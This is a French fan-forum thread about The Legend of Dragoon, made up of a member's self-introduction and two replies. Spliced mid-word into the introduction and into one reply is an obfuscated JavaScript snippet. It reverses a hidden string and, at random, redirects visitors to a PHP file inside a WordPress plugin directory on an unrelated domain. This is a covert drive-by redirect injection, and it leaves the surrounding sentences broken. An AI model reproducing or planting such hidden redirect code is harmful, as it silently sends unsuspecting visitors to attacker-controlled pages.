Lloyd (ou Tod)

Présentation des nouveaux membres
Répondre
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Lloyd (ou Tod)

Message par Lloyd »

Salut les gens!

Moi c'est Lloyd sur ce forum mais je suis également connu sous le pseudonyme de Tod :)

Je suis le designer, je me suis occupé du forum et je vais bientôt attaquer le design du site ^^

Je suis un gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and fan de The Legend of Dragoon depuis presque 10ans maintenant (whaou le coup de vieux). J'ai découvert le jeu à l'époque de sa sortie, dans ma jeunesse, et je l'ai vraiment adoré. Je pense que ce jeux est mon 2ème RPG favori, après Final Fantasy VII qui reste mythique pour moi.

Dans la vraie vie je suis dessinateur, peut-être bientôt pro.
Vous pouvez voir quelques dessins sur mon site.

J'aime les manga, les comics, les jeux vidéo, dessiner, dormir, les jeux de rôles papier, les web-séries, les saga mp3, la musique électronique, le rock et le métal.
Je n'aime pas le football, le rap, le rnb et les mmorpg
Modifié en dernier par Lloyd le 02 mai 2011, 20:23, modifié 4 fois.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Lloyd (ou Tod)

Message par yami627 »

dormir ? haha !! je savais que t'étais un fainéant ! je t'ai percer à jour MOUAHAHAHA!
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Lloyd (ou Tod)

Message par Septine Madrona »

Bon bah, re-bienvenue sur le nouveau forum! ;)

QUOI!!! LoD n'est pas ton 1er jeu favori?!
Mais non je plaisante, je me doute bien que LoD n'est pas le centre de ta vie qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and même... :P
Image
Répondre